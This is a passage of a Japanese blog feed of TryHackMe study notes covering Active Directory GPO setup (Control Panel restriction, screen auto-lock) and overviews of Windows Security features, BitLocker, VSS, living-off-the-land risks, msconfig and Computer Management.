<figure class="wp-block-image size-full is-resized"><img decoding="async" width="1019" height="782" src="https://cybermemo.blog/wp-content/uploads/2025/10/強制パスワード変更.png" alt="強制パスワード変更" class="wp-image-363" style="width:508px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/強制パスワード変更.png 1019w, https://cybermemo.blog/wp-content/uploads/2025/10/強制パスワード変更-300x230.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/強制パスワード変更-768x589.png 768w" sizes="(max-width: 1019px) 100vw, 1019px" /></figure>



<p>デスクトップにフラグを発見。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="1015" height="453" src="https://cybermemo.blog/wp-content/uploads/2025/10/フラグ.jpg" alt="Sophieのデスクトップ" class="wp-image-364" style="width:616px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/フラグ.jpg 1015w, https://cybermemo.blog/wp-content/uploads/2025/10/フラグ-300x134.jpg 300w, https://cybermemo.blog/wp-content/uploads/2025/10/フラグ-768x343.jpg 768w" sizes="(max-width: 1015px) 100vw, 1015px" /></figure>



<h4 class="wp-block-heading">Task5 実演</h4>



<p><strong>1.コンピューターの移動</strong><br>シナリオ：デフォルトでDCを除くすべてのマシンは「Computers」コンテナに配置される。最適なOUを作成し、各マシンを配置しなおす。</p>



<p>1-1.まずは「Workstations」と「Servers」OUを作成。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="232" height="140" src="https://cybermemo.blog/wp-content/uploads/2025/10/OU作成-1.png" alt="OU作成" class="wp-image-368"/></figure>



<p>1-2.次に適切なOUにマシンを移動。<br></p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="791" height="485" src="https://cybermemo.blog/wp-content/uploads/2025/10/移動.png" alt="マシンの移動" class="wp-image-369" style="width:568px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/移動.png 791w, https://cybermemo.blog/wp-content/uploads/2025/10/移動-300x184.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/移動-768x471.png 768w" sizes="(max-width: 791px) 100vw, 791px" /></figure>



<h4 class="wp-block-heading">Task6 実演</h4>



<p> <strong>1.コントロールパネルへのアクセス制限</strong><br>シナリオ：コントロールパネルへのアクセスをIT部門のユーザーのみに制限したい。</p>



<p>1-1.GPO「Restrict Control Panel Access」を作成。</p>



<p>Group Policy Management → 「Group Policy Objects」を右クリック → New </p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="729" height="584" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-1.png" alt="「Restrict Control Panel Access」を作成" class="wp-image-374" style="width:526px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-1.png 729w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-1-300x240.png 300w" sizes="(max-width: 729px) 100vw, 729px" /></figure>



<p>「Restrict Control Panel Access」→ OK</p>



<figure class="wp-block-image size-full"><img decoding="async" width="381" height="179" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-2.png" alt="「Restrict Control Panel Access」を作成" class="wp-image-375" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-2.png 381w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-2-300x141.png 300w" sizes="(max-width: 381px) 100vw, 381px" /></figure>



<p>1-2.「Restrict Control Panel Access」ポリシーを編集。</p>



<p>「Restrict Control Panel Access」を右クリック → Edit</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="671" height="432" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-3.png" alt="「Restrict Control Panel Access」ポリシーを編集" class="wp-image-376" style="width:576px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-3.png 671w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-3-300x193.png 300w" sizes="(max-width: 671px) 100vw, 671px" /></figure>



<p>User Configuration → Policies → Administrative Templates → Control Panel に移動。<br>「Prohibit access to Control Panel and PC settings」 を Enabled（有効） にする。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="857" height="508" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-4.png" alt="「Restrict Control Panel Access」ポリシーを編集" class="wp-image-377" style="width:587px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-4.png 857w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-4-300x178.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-4-768x455.png 768w" sizes="(max-width: 857px) 100vw, 857px" /></figure>



<p>1-3.「Restrict Control Panel Access」をリンク。</p>



<p>Marketing、Management、Sales に「Restrict Control Panel Access」をドラック＆ドロップ。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="251" height="297" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-5-1.png" alt="「Restrict Control Panel Access」をリンク" class="wp-image-379"/></figure>



<p><strong>2.すべてのマシンに自動ロックを適用する</strong><br>シナリオ：すべてのマシンに5 分間のアイドルで自動ロックの設定をする。</p>



<p>2-1.GPO「Auto Lock Screen」を作成。</p>



<p>Group Policy Management → 「Group Policy Objects」を右クリック → New → Auto Lock Screen → OK</p>



<figure class="wp-block-image size-full"><img decoding="async" width="383" height="175" src="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-1.png" alt="GPO「Auto Lock Screen」を作成" class="wp-image-383" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-1.png 383w, https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-1-300x137.png 300w" sizes="(max-width: 383px) 100vw, 383px" /></figure>



<p>2-2.「Auto Lock Screen」ポリシーを編集。</p>



<p>Computer Configuration → Policies → Windows Settings → Security Settings → Local Policies → Security Options → Interactive logon: Machine inactivity limit → 値を 5 分（＝300 秒） に設定し、OK。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="1011" height="607" src="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-2.jpg" alt="「Auto Lock Screen」ポリシーを編集" class="wp-image-386" style="width:656px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-2.jpg 1011w, https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-2-300x180.jpg 300w, https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-2-768x461.jpg 768w" sizes="(max-width: 1011px) 100vw, 1011px" /></figure>



<p>2-3.「Auto Lock Screen」をリンク。</p>



<p>thm.local（ルートドメイン）に「Auto Lock Screen」をドラック＆ドロップ。</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="246" height="555" src="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-3-1.png" alt="「Auto Lock Screen」をリンク" class="wp-image-388" style="width:197px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-3-1.png 246w, https://cybermemo.blog/wp-content/uploads/2025/10/自動画面ロック-3-1-133x300.png 133w" sizes="(max-width: 246px) 100vw, 246px" /></figure>



<p><strong>3.GPOが適用されているか確認。</strong></p>



<p>まずは、「Mark」でRDPログイン。</p>



<pre class="wp-block-code"><code>xfreerdp3 /v:IPアドレス /u:'THM¥ユーザー名' /p:'パスワード'</code></pre>



<p>gpupdate /force でポリシーを即時適用。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="430" height="82" src="https://cybermemo.blog/wp-content/uploads/2025/10/ポリシー即時適用.png" alt="gpupdate /force" class="wp-image-391" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/ポリシー即時適用.png 430w, https://cybermemo.blog/wp-content/uploads/2025/10/ポリシー即時適用-300x57.png 300w" sizes="(max-width: 430px) 100vw, 430px" /></figure>



<p>コントロールパネルを開こうとするとエラーになる。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="559" height="126" src="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-確認作業2.png" alt="コントロールパネルエラー" class="wp-image-393" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-確認作業2.png 559w, https://cybermemo.blog/wp-content/uploads/2025/10/コントロールパネルへのアクセス制限-確認作業2-300x68.png 300w" sizes="(max-width: 559px) 100vw, 559px" /></figure>



<p>後は、5分放置して画面が自動ロックになるか確認して終了。</p>



<h2 class="wp-block-heading">つまづいたこと</h2>



<h3 class="wp-block-heading">グループとOUの違い</h3>



<p>グループもOUも同じもののように見えた。<br>例えば、営業部のAさんがいたとして<br>グループ：営業<br>OU：営業<br>権限：営業<br>となると、OUとグループの役割が重複しているのでは？と思った。<br>ChatGPTに聞いてみた結果</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<ul class="wp-block-list">
<li>Aさんのアカウント → OU「営業」に所属
<ul class="wp-block-list">
<li>→ 営業部用のポリシー（例：USB禁止、壁紙設定など）が自動適用</li>
</ul>
</li>



<li>Aさんのアカウント → グループ「営業」にも所属
<ul class="wp-block-list">
<li>→ 営業フォルダのアクセス権限を持つ</li>
</ul>
</li>
</ul>



<p>👉 つまり「OUとグループは別の役割を持っていて、重複して使うものではない」んです。</p>
</blockquote>



<p>とのこと。自身で調べてみても間違ってはいなさそう。<br>ざっくり<br>OU = GPOを適用<br>グループ = フォルダアクセス権を適用　の違いがあることは覚えた。</p>




]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-active-directory-basics/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Windows Fundamentals 3 — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-windows-fundamentals-3</link>
					<comments>https://cybermemo.blog/tryhackme-windows-fundamentals-3#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sun, 28 Sep 2025 14:43:56 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Defender]]></category>
		<category><![CDATA[Windows]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=281</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Windows Fundamentals 3 の備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 Windows Fundamentals 3 Windows Securi [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Windows Fundamentals 3 の備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/presec-room-image16.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/windowsfundamentals3xzx" target="_blank" rel="noopener noreferrer">Windows Fundamentals 3</a>
						<span class="p-blogCard__excerpt">In part 3 of the Windows Fundamentals module, learn about the built-in Microsoft tools that help keep the device secure, such as Windows Updates, Windows Securi&#8230;</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Windows Fundamentals 3</h2>



<h3 class="wp-block-heading">Windows Security</h3>



<p>旧名称：Windows Defender Security Center<br>Windowsに最初から入っているセキュリティ機能を一元管理するツール。<br>ウイルス対策やファイアウォール、デバイス保護などをまとめて確認・設定できる。</p>



<h4 class="wp-block-heading"><strong>主な機能</strong></h4>



<p>Virus &amp; threat protection (ウイルスと脅威の防止 )<br>Windows Defender Antivirus（標準のウイルス対策ソフト）の状態を管理。<br>スキャン、ウイルス定義の更新、検出ログ確認など。<br><br>Firewall &amp; network protection (ファイアウォールとネットワーク保護)<br>Windows Defender Firewall の管理。<br>ネットワークごと（ドメイン/プライベート/パブリック）に制御できる。<br><br>App &amp; browser control(アプリとブラウザの制御 )<br>Microsoft Defender SmartScreen の設定。<br>危険なアプリやフィッシングサイトのブロック。<br><br>Device security (デバイスセキュリティ)<br>ハードウェアレベルの保護（TPM、セキュアブート、仮想化ベースのセキュリティなど）。</p>



<h4 class="wp-block-heading"><strong>マークの意味</strong></h4>



<p>Windowsセキュリティの各項目には、状態を示すマークが表示される。<br><br>✅ 緑色（チェックマーク）<br>→ 「問題なし」の状態。正常に動作していて、特に操作は不要。<br>例：ファイアウォールが有効、アプリ制御がオンになっている場合。<br><br>⚠️ 黄色（警告アイコン/感嘆符）<br>→ 「注意が必要」な状態。<br>設定が推奨されるが、セキュリティ上、致命的ではない場合に表示。<br>例：ウイルススキャンがしばらく実行されていない。<br><br>❌ 赤色（×マーク）<br>→ 「危険」や「対処が必要」な状態。<br>セキュリティ保護が無効になっていたり、脅威が検出された場合に表示。<br>例：ウイルス対策が無効、マルウェアが検出された。</p>



<p>Windows Security の画面<br>※Windows Server 2019エディション</p>



<figure class="wp-block-image size-full is-resized"><img decoding="async" width="788" height="623" src="https://cybermemo.blog/wp-content/uploads/2025/09/Windows-Security.png" alt="Windows Security" class="wp-image-306" style="width:517px;height:auto" srcset="https://cybermemo.blog/wp-content/uploads/2025/09/Windows-Security.png 788w, https://cybermemo.blog/wp-content/uploads/2025/09/Windows-Security-300x237.png 300w, https://cybermemo.blog/wp-content/uploads/2025/09/Windows-Security-768x607.png 768w" sizes="(max-width: 788px) 100vw, 788px" /></figure>



<h3 class="wp-block-heading">Virus &amp; threat protection（ウイルスと脅威からの保護）</h3>



<p>Windowsに標準搭載されているウイルス対策機能。<br>マルウェア（ウイルス、ワーム、トロイの木馬、ランサムウェアなど）からPCを守る。<br>定期的なスキャンやリアルタイム保護を行い、脅威が見つかると通知してくれる。<br>サードパーティ製のアンチウイルスソフト（例：Norton、McAfeeなど）を入れると、この項目がそのソフトに切り替わることもある。</p>



<h4 class="wp-block-heading"><strong>主な機能</strong></h4>



<p><strong>Current threats（<strong>現在の脅威</strong>）</strong><br>PC上に現在存在する脅威を確認する機能。<br><br>主な項目<br>現在の脅威一覧：検出されたマルウェアがあればここに表示される。<br>スキャン結果：最後にスキャンした日時、スキャンの種類（クイック/フル/カスタム）、検出数、処理結果。<br>スキャンオプション：<br>　-クイックスキャン：感染しやすい場所だけ短時間でチェック。<br>　-フルスキャン：全ファイルやプログラムを調査。時間がかかる。<br>　-カスタムスキャン：ユーザーが指定したフォルダやドライブを確認。<br>Threat history（脅威の歴史）：<br>Last scan（最後のスキャン）<br>最後に実行したスキャン日時や結果が記録される。<br>Quarantined threats（隔離された脅威）<br>検出されたウイルスやマルウェアを「隔離領域」に移動して、PC上で実行されないようにしたもの。<br>ユーザーはここから削除したり、誤検知であれば「復元」することも可能。<br>Allowed threats（許可した脅威）<br>本来は脅威として検出されたが、ユーザーが「安全だ」と判断して実行を許可した項目。<br>注意：セキュリティ的にはリスクが高いため、100%安全だと確信がある場合のみ許可するべき。</p>



<p><strong>Virus &amp; threat protection settings（<strong>ウイルスと脅威の防止設定</strong>）</strong><br>マルウェア対策の細かい挙動を設定できる場所。</p>



<p>主な項目<br>Real-time protection（リアルタイム保護）：常に動作している監視。オフにすると危険。<br>Cloud-delivered protection（クラウド提供の保護）：最新の脅威情報をクラウドから取得し、より早く防御。<br>Automatic sample submission（自動サンプル送信）：怪しいファイルをMicrosoftに送って解析。<br>Controlled Folder Access（制御されたフォルダアクセス）：特定のフォルダ（例：ドキュメント、ピクチャ、デスクトップなど）を保護領域に指定する機能。<br>Exclusions（除外設定）：特定のフォルダやファイルをスキャン対象外にする（誤検知対策）。<br>Notifications（通知）：検出や問題があればユーザーに知らせる。<br><br>注意<br>リアルタイム保護やクラウド保護を切ると感染リスクが大幅に上がる。</p>



<p><strong>Virus &amp; threat protection updates（<strong>ウイルスと脅威からの保護の更新</strong>）</strong><br>セキュリティ定義ファイル（ウイルス定義データベース）を最新に保つ。<br><br>主な項目<br>Check for updates（更新確認）ボタンで手動更新可能。<br>通常は自動更新されるため、最新のウイルスにも対応できる。</p>



<p>ポイント<br>古い定義のままだと新種のウイルスを検知できないので、更新の有無は非常に重要。</p>



<p><strong>Ransomware protection（<strong>ランサムウェア対策</strong>）</strong><br>ランサムウェアによる「ファイル暗号化」からデータを守る。<br><br>主な項目<br>Controlled folder access（制御されたフォルダアクセス）<br>特定フォルダ（例：ドキュメント、ピクチャ）を守り、未知のアプリが勝手に変更できないようにする。この機能を使うにはリアルタイム保護を有効にしなければいけない。</p>



<h3 class="wp-block-heading">Firewall &amp; network protection（ファイアウォールとネットワーク保護）</h3>



<p>Windowsに標準搭載されているネットワーク保護機能。<br>ドメイン・プライベート・パブリックといったネットワークごとに通信ルールを制御し、<br>外部からの不正アクセスや不要なアプリの通信をブロックできる。</p>



<h4 class="wp-block-heading"><strong>主な機能</strong></h4>



<p><strong>プロファイル</strong><br><br>Domain network<br>ドメイン参加時に使う社内向けプロファイル。企業ポリシーで管理されることが多い。<br><br>Private network（active）<strong><br></strong>家庭/社内の信頼できるネットワーク。共有や発見を許可する設定が選べる。<br><br>Public network<br>公共Wi-Fi等の不特定多数が利用する環境。最も厳格（受信接続は原則ブロック）。</p>



<p><strong>追加オプション</strong></p>



<p>（Allow an app through firewallアプリをファイアウォール経由で許可する）<br>特定のアプリやサービスについて、ファイアウォールのブロックを解除し通信を許可する設定。<br>例えば、ゲームやリモートデスクトップ、開発用のWebサーバーなどを動かすときに必要。<br><br>Network and Internet troubleshooter（ネットワークとインターネットのトラブルシューティング）<br>ネットワーク接続の問題（Wi-Fiにつながらない、通信が不安定など）を自動診断・修復するツール。<br>ファイアウォール設定が原因で通信できない場合にも役立つ。<br><br>Firewall notification settings（ファイアウォール通知の設定）<br>新しいアプリが通信をしようとしたときに、通知を表示するかどうかを設定できる。<br>通常はオンにしておくのがおすすめ。安全でないアプリの通信を防ぐ手がかりになる。<br><br>Advanced settings（詳細設定）<br>Windows Defender Firewall with Advanced Security の画面を開く。<br>送信ルールや受信ルールを細かく設定可能。ポート番号・プロトコル・アプリ単位で制御できる。<br>企業ネットワークやサーバー管理で使われることが多い。<br><br>Restore firewalls to default（ファイアウォールを既定に戻す）<br>ファイアウォールの設定をすべてリセットして、初期状態に戻す。<br>設定を間違えて通信できなくなった場合などのトラブル解決に有効。</p>



<h3 class="wp-block-heading">App &amp; browser control（アプリとブラウザのコントロール）</h3>



<p>主に Microsoft Defender SmartScreen という仕組みを利用して、危険なWebサイトやアプリからPCを保護する。<br>信頼できないファイルや不審なWebコンテンツを検出し、ユーザーに警告を出す。</p>



<h4 class="wp-block-heading">主な機能</h4>



<p><strong>Check apps and files（アプリとファイルの確認）</strong><br>Windows Defender SmartScreen が、インターネットや外部から入ってくる未知または信頼されていないアプリ・ファイルをチェックして、危険なものの実行を防ぐ。<br><br>Block（ブロック）<br>不審なアプリやファイルを検出した場合、実行自体をブロックする。安全性が高い設定。<br>Warn（警告）<br>実行前に警告を表示。ユーザーが「続行」を選べば実行できる。利便性と安全性のバランス。<br>Off（無効）<br>チェックを行わない。セキュリティ的にリスクが高いため推奨されない。<br><br><strong>Exploit protection（<strong>エクスプロイト防止</strong>）<br></strong>Windows10以降に標準搭載されている、脆弱性を悪用した攻撃（エクスプロイト）からPCを守る仕組み。<br>メモリ破壊系の攻撃や不正コード実行など、一般的なエクスプロイト手法を困難にする。</p>



<h3 class="wp-block-heading">Device security（デバイスセキュリティ）</h3>



<p>ハードウェアレベルの保護機能（TPM、Secure Boot、仮想化ベースのセキュリティなど）の状態を表示。<br>この設定を変更することは稀。</p>



<h3 class="wp-block-heading"><strong>BitLocker</strong>（ディスク暗号化機能）</h3>



<p>正式名称：BitLocker Drive Encryption<br>目的：PCのハードディスクやSSD全体を暗号化して、不正アクセスからデータを保護する。<br>仕組み：AES（Advanced Encryption Standard）という強力な暗号化方式を使い、ディスク上のデータを「読み取り不可能な状態」にする。</p>



<h4 class="wp-block-heading">特徴</h4>



<p>PCを盗まれても安心<br>HDDやSSDを取り外して別のPCにつないでも、中身は暗号化されているため読み取れない。<br><br>OSごと暗号化<br>ディスク全体を暗号化するため、ファイル単位ではなく「PCそのもののセキュリティ」を高められる。<br><br>TPMチップ連携<br>Trusted Platform Module（TPM：信頼できるプラットフォームモジュール）<sup data-fn="cebeed89-14ea-4f4c-98a3-9a98975e7926" class="fn"><a href="#cebeed89-14ea-4f4c-98a3-9a98975e7926" id="cebeed89-14ea-4f4c-98a3-9a98975e7926-link">1</a></sup>と連携し、起動時にハードウェアの改ざんを検出できる。<br><br>回復キー<br>パスワードを忘れた場合やPCに大きな変更があった場合は、セットアップ時に生成される「回復キー」で復旧可能。</p>


<ol class="wp-block-footnotes"><li id="cebeed89-14ea-4f4c-98a3-9a98975e7926">パソコンに搭載されているセキュリティ専用チップのこと。暗号鍵や証明書などの重要情報を安全に保存するための領域を持つ。PCの金庫役。 <a href="#cebeed89-14ea-4f4c-98a3-9a98975e7926-link" aria-label="脚注参照1にジャンプ">↩︎</a></li></ol>


<h3 class="wp-block-heading">Volume Shadow Copy Service / VSS（ボリューム・シャドウ・コピー・サービス）</h3>



<p>ファイルやシステムを使用中（稼働中）の状態でも、一時的なスナップショット（シャドウコピー） を作成できる。<br>そのスナップショットを利用して、バックアップや復元を行うことが可能。<br>例えば、システムの「復元ポイント」や、バックアップソフトが動作中に使っている。</p>



<h4 class="wp-block-heading"><strong>主な役割</strong></h4>



<p>ファイルを開いたままでもバックアップ可能<br>→ 通常は編集中のファイルをコピーできないが、VSSがスナップショットを作ることで可能になる。<br><br>システム復元に利用<br>→ Windowsの「復元ポイント」もVSSによって管理されている。<br><br>アプリやサービスと連携<br>→ SQL Server や Exchange などのデータベースも VSS を利用して一貫性のあるバックアップを実現できる。</p>



<h4 class="wp-block-heading">セキュリティや注意点</h4>



<p>ランサムウェア攻撃では、復元できなくするためにこのVSSのスナップショットが削除されることが多い。<br>そのため、VSSは便利だが完全なバックアップ手段ではなく、外部媒体へのバックアップも重要。</p>



<h3 class="wp-block-heading">Living Off The Land / LotL（環境寄生型攻撃）</h3>



<p>攻撃者がOSや標準ツール（既に存在する正当なバイナリ/機能）を悪用してマルウェアを配布・持続化・横展開・情報窃取などを行う手法。<br>これまでに紹介したWindowsの標準機能も、LotL攻撃で悪用されることがある。</p>



<h4 class="wp-block-heading">具体例</h4>



<p>PowerShellを使ってDefenderの設定を無効化する。<br>netshコマンドを使ってFirewallルールを改変する。<br>VSSを削除してバックアップを無効化する。<br>BitLockerを悪用して強制暗号化し、利用者がデータにアクセスできなくする。<br>など</p>
]]></content:encoded>
					
					<wfw:commentRss>https://cybermemo.blog/tryhackme-windows-fundamentals-3/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>TryHackMe Windows Fundamentals 2 — 学習メモ</title>
		<link>https://cybermemo.blog/tryhackme-windows-fundamentals-2</link>
					<comments>https://cybermemo.blog/tryhackme-windows-fundamentals-2#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sat, 27 Sep 2025 14:53:43 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Windows]]></category>
		<category><![CDATA[システム管理]]></category>
		<category><![CDATA[トラブルシューティング]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=253</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>はじめに Windows Fundamentals 2 の備忘録。本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。 Windows Fundamentals 2 Windows Fundam [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/09/TryHackMe用アイキャッチ.png" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Windows Fundamentals 2 の備忘録。<br>本記事は学習記録です。演習環境のターゲット名・IP・フラグは公開していません。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/presec-room-image15.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/windowsfundamentals2x0x" target="_blank" rel="noopener noreferrer">Windows Fundamentals 2</a>
						<span class="p-blogCard__excerpt">In part 2 of the Windows Fundamentals module, discover more about System Configuration, UAC Settings, Resource Monitoring, the Windows Registry and more..</span>					</div>
				</div>
			</div>
		</div>


<h2 class="wp-block-heading">Windows Fundamentals 2</h2>



<h3 class="wp-block-heading">Windows Fundamentals 2 についてのメモ</h3>



<p>Windowsのトラブルシューティングの基礎知識。<br>以後、Windowsで問題が発生した際はここで概要を確認。</p>



<h3 class="wp-block-heading">システム構成</h3>



<h4 class="wp-block-heading">システム構成ユーティリティ（msconfig.exe）</h4>



<p>「システム構成ユーティリティ（MSConfig）」はWindowsに標準搭載されているシステム管理ツールの一つで、スタートアップやブート動作の調整に使える。</p>



<p><strong>概要</strong></p>



<p>実行ファイル名： msconfig.exe<br>場所： <code>%systemroot%\system32\msconfig.exe</code><br>目的：Windowsの起動設定やサービス、スタートアッププログラムの管理を行い、トラブルシューティングやパフォーマンス改善に利用する。</p>



<p><strong>主な機能</strong></p>



<p><strong>全般 (General)</strong><br>Windowsの起動方法を切り替える基本設定タブ。<br><br>通常スタートアップ<br>すべてのドライバ・サービスを読み込む（通常運用）。<br><br>診断スタートアップ<br>Windows を最小限のドライバとサービスで起動（セーフモードに近い）。トラブル原因切り分けに使う。<br><br>選択スタートアップ<br>読み込むサービスやスタートアップ項目をユーザーが選択可能。</p>



<p><strong>ブート (Boot)</strong><br>起動オプションを指定できる。<br><br>Safe Boot（セーフブート）<br>最小限のサービスだけで起動。ネットワーク付きセーフモードも選べる。<br><br>No GUI boot（GUIなしブート）<br>Windowsロゴや進捗バーを表示せずに黒画面で起動する。</p>



<p>Boot log（ブートログ出力）<br>起動時にロードされたドライバを C:\Windows\ntbtlog.txt に記録する。ドライバの不具合調査に使う。</p>



<p>Base video（基本VGAドライバで起動）<br>標準VGAドライバで起動する。グラフィックドライバの問題切り分けに使う。</p>



<p>OS boot information（OSブート情報表示）<br>起動時にロードされるドライバ名を逐次画面に表示する。どのドライバで停止しているか調査できる。</p>



<p><strong>サービス (Services)</strong><br>Windowsサービスの一覧を表示。<br>不要なサービスを一時的に停止して、問題切り分けに利用可能。<br>※常駐セキュリティソフト等を止めると危険なので注意。</p>



<p><strong>スタートアップ (Startup)</strong><br>現在はタスクマネージャー（taskmgr）のスタートアップタブに移管されたため利用することはほとんどない。</p>



<p><strong>ツール (Tools)</strong></p>



<p>各種管理ツール（イベントビューア、コマンドプロンプト、レジストリエディタなど）へのショートカット。<br>管理者向けの便利メニュー。</p>



<h3 class="wp-block-heading">コンピュータ管理</h3>



<h4 class="wp-block-heading">コンピュータの管理 (compmgmt.msc)</h4>



<p>Windowsに標準で搭載されている 統合管理コンソール（MMCスナップインの1つ）。システムのさまざまな管理ツールを一つの画面から利用できる。</p>



<p><strong>概要</strong></p>



<p>実行ファイル名： compmgmt.msc<br>場所： <code>%systemroot%\system32\compmgmt.msc</code><br>目的：システム管理ツールを統合的に利用できる管理コンソール。ユーザーやグループ管理、イベントログ確認、ディスク管理、サービスの制御などを一元的に行う。</p>



<p><strong>主な機能</strong></p>



<p><strong>システムツール (System Tools)</strong><br>PCの基本的な管理に関するツール群。<br><br>タスクスケジューラ<br>定期的なタスク（バックアップ、更新処理など）を自動実行する設定。<br><br>イベントビューア<br>システムログ・アプリケーションログを確認し、エラーや警告を調査できる。<br><br>共有フォルダ<br>共有設定されているフォルダや接続中のユーザーを確認。<br><br>ローカルユーザーとグループ (lusrmgr.msc)<br>ユーザーアカウントやグループの作成・管理。<br><br>パフォーマンス (Performance)<br>CPU・メモリ・ディスク・ネットワークなどのリソース利用状況をリアルタイムまたはログから監視できる。<br>詳細な解析やボトルネック調査、リソースモニターの起動も可能。<br><br>デバイスマネージャー (Device Manager)<br>ハードウェアやドライバーの管理。</p>



<p><strong>記憶域 (Storage)</strong><br>ハードディスクやパーティション、バックアップの管理を行う機能。<br>ディスクの初期化・フォーマット・容量の調整、システムのバックアップや復元など、記憶装置に関する操作をまとめて管理できる。<br><br>ディスクの管理 (Disk Management)<br>パーティション作成、フォーマット、ボリューム拡張などを行う。<br><br>Windows Server バックアップ (Windows Server Backup)<br>サーバーのバックアップや復元を管理。</p>



